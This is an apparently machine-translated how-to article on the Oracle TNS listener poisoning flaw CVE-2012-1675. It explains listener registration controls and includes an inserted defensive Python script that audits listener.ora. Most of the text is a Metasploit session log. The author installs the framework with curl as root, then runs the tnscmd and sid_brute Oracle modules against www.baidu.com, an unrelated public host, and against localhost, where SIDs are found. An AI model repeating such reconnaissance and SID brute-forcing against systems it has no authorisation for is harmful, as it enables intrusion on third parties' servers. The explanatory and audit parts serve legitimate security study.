
Oracle TNS Listener Remote Poisoning test

2025-02-25 Update From: SLTechnology News&Howtos

Remote data poisoning vulnerability (CVE-2012-1675)

A vulnerability that allows a user to poison data processed by a remote "TNS Listener" component without providing a username/password.

COST stands for Class of Secure Transports. It is a security control mechanism for instance registration. Its purpose is to restrict which instances can register with a given listener, and over which protocols. This avoids the risk of malicious registration by other remote instances and the resulting risk of information disclosure.

It does this through the parameter SECURE_REGISTER_listener_name in listener.ora, whose value is a transport list (the list of protocols permitted for registration, such as IPC, TCP, TCPS). This feature is supported from version 10.2.0.3 (although it is not explicitly stated in the online documentation for 10g R2) and is still available in version 11.2.0.4 and later. However, after 11.2.0.4, Oracle recommends that you use the default VNCR configuration.
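A defender-side check for the setting described above, as an added example (not code from the original article or from Oracle): it reads a listener.ora and reports, per listener, whether registration is restricted by SECURE_REGISTER_listener_name (COST) or by VALID_NODE_CHECKING_REGISTRATION_listener_name (the VNCR parameter, which the article names only by acronym). The sample file, host names and status labels are constructed, and treating plain TCP in the COST list as still open to network registration is this example's reading of the parameter.

```python
import re

# Constructed sample listener.ora (listener names, hosts and ports are made up).
SAMPLE = """\
LISTENER =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521))
    (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521)))
SECURE_REGISTER_LISTENER = (IPC)
LISTENER_APP = (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1522))
SECURE_REGISTER_LISTENER_APP = (TCP, IPC)
LISTENER_OLD = (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1523))
LISTENER_VNCR = (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1524))
VALID_NODE_CHECKING_REGISTRATION_LISTENER_VNCR = ON
"""

def parse_listener_ora(text):
    """Map each top-level NAME to its (possibly multi-line) value."""
    entries, name, depth = {}, None, 0
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        # A new entry can only start outside any open parenthesis.
        m = re.match(r"([A-Za-z0-9_.]+)\s*=\s*(.*)", line) if depth == 0 else None
        if m:
            name = m.group(1).upper()
            entries[name] = m.group(2)
        elif name:
            entries[name] += " " + line.strip()
        depth += line.count("(") - line.count(")")
    return entries

def audit_registration(text):
    """Classify how each listener restricts instance registration."""
    cfg, report = parse_listener_ora(text), {}
    for name, value in cfg.items():
        if "ADDRESS" not in value.upper() or name.startswith("SID_LIST_"):
            continue  # not a listener definition
        cost = cfg.get("SECURE_REGISTER_" + name)
        vncr = cfg.get("VALID_NODE_CHECKING_REGISTRATION_" + name, "").strip().upper()
        if cost is not None:
            protos = set(re.findall(r"[A-Z]+", cost.upper()))
            # Assumption: plain TCP in the list still accepts network registration.
            report[name] = "cost-allows-tcp" if "TCP" in protos else "cost-restricted"
        elif vncr and vncr not in ("OFF", "0"):
            report[name] = "vncr-enabled"
        else:
            report[name] = "no-explicit-restriction"
    return report

if __name__ == "__main__": print(audit_registration(SAMPLE))
```

A listener reported as no-explicit-restriction relies on whatever its Oracle version does by default, so it is the one to check against the vendor guidance first.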

Harm

The main harm is that a user can create a database with the same name as the current production database and register it with the production database's listener.

This causes user connections to be routed to the instance created by that user, resulting in an interruption of the business response.

The application reports ORA-12545: Connect failed because target host or object does not exist

Affected versions

Although the security alert describes the affected versions as starting from 10.2.0.3, it is actually any version starting from 8i.

4. My verification

[root@204_maridb]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \

chmod 755 msfinstall && \

./msfinstall

Total Received Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

5532 5532 00 6758 0 -:-6754

Checking for and installing update..

Adding metasploit-framework to your repository list..

Loaded plug-in: fastestmirror

Repository base is listed more than once in the configuration

Repository updates is listed more than once in the configuration

Repository extras is listed more than once in the configuration

Repository centosplus is listed more than once in the configuration

Metasploit | 2.9 kB 00:00:00

Metasploit/primary_db | 9.8 kB 00:00:00

Loading mirror speeds from cached hostfile

Epel: mirrors.tuna.tsinghua.edu.cn

Resolving dependencies

--> checking transaction

---> package metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 will be installed

--> resolve dependency completion

Dependency resolution

================================================================================

Package               Arch    Version                                            Repository  Size

Installing:

metasploit-framework  x86_64  5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6  metasploit  195 M

Transaction summary

Install 1 package

Total downloads: 195m

Installation size: 433 m

Downloading packages:

Warning: /var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: header V4 RSA/SHA256 Signature, key ID 2007b954: NOKEY

The public key of metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm has not been installed

Metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07

Retrieve the key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

Import GPG key 0x2007B954:

User ID: "Metasploit"

Fingerprint: 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954

From: /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

Running transaction check

Running transaction test

Transaction test succeeded

Running transaction

Installing: metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

Run msfconsole to get started

Validating: metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

Installed:

metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

Over!

[root@204_maridb ~]# ms

msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msgcmp msgconv msgexec msgfmt msghack msgmerge msguniq

msfconsole msfdb msfmachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2mysql

[root@204_maridb ~]# msfconsole

-bash: /usr/local/bin/msfconsole: there is no such file or directory

[root@204_maridb ~]# which msfconsole

/usr/bin/msfconsole

[root@204_maridb ~]# /usr/bin/msfconsole

[-] ***rting the Metasploit Framework console...|

[-] WARNING: No database support: No database YAML file

[-]


=[ metasploit v5.0.19 ]

=[ 1880 exploits - 1062 auxiliary - 328 post ]

=[ 546 payloads - 44 encoders - 10 nops ]

=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > info

Name: Oracle TNS Listener Command Issuer

Module: auxiliary/admin/oracle/tnscmd

License: Metasploit Framework License (BSD)

Rank: Normal

Disclosed: 2009-02-01

Provided by:

MC

Check supported:

No

Basic options:

Name    Current Setting                   Required  Description

CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..

RHOSTS                                    yes       The target address range or CIDR identifier

RPORT   1521                              yes       The target port (TCP)

Description:

This module allows for the sending of arbitrary TNS commands in

order to gather information. Inspired from tnscmd.pl from

www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.xxxx.cc

RHOST => www.xxxx.cc

msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name    Current Setting                   Required  Description

CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..

RHOSTS  www.xxxx.cc                       yes       The target address range or CIDR identifier

RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run

[-] Auxiliary failed: option RHOSTS failed to validate.

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.baidu.com

RHOST => www.baidu.com

msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name    Current Setting                   Required  Description

CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..

RHOSTS  www.baidu.com                     yes       The target address range or CIDR identifier

RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run

[*] Running module against 61.135.169.125

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).

[*] Running module against 61.135.169.121

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute

msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name     Current Setting                                                      Required  Description

RHOSTS                                                                        yes       The target address range or CIDR identifier

RPORT    1521                                                                 yes       The target port (TCP)

SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.

SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST www.baidu.com

RHOST => www.baidu.com

msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name     Current Setting                                                      Required  Description

RHOSTS   www.baidu.com                                                        yes       The target address range or CIDR identifier

RPORT    1521                                                                 yes       The target port (TCP)

SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.

SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 61.135.169.121

[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).

[*] Running module against 61.135.169.125

[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1

RHOST => 127.0.0.1

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'PLSExtProc'

[+] 127.0.0.1 Found SID 'TSH1'

[*] 127.0.0.1:1521 - Done with brute force...

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'PLSExtProc'

[-] 127.0.0.1:1521 - The connection was refused by the remote host.

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'PLSExtProc'

[+] 127.0.0.1 Found SID 'TSH1'

[*] 127.0.0.1:1521 - Done with brute force...

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) >

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[*] 127.0.0.1:1521 - Done with brute force...

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[*] 127.0.0.1:1521 - Done with brute force...

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) > exit

[root@204_maridb ~]# /usr/bin/msfconsole

[-] ***rting the Metasploit Framework console...|

[-] WARNING: No database support: No database YAML file

[-]


=[ metasploit v5.0.19 ]

=[ 1880 exploits - 1062 auxiliary - 328 post ]

=[ 546 payloads - 44 encoders - 10 nops ]

=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name    Current Setting                   Required  Description

CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..

RHOSTS                                    yes       The target address range or CIDR identifier

RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1

RHOST => 127.0.0.1

msf5 auxiliary(admin/oracle/sid_brute) > run

[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...

[+] 127.0.0.1 Found SID 'TSH1'

[*] 127.0.0.1:1521 - Done with brute force...

[*] Auxiliary module execution completed

msf5 auxiliary(admin/oracle/sid_brute) >
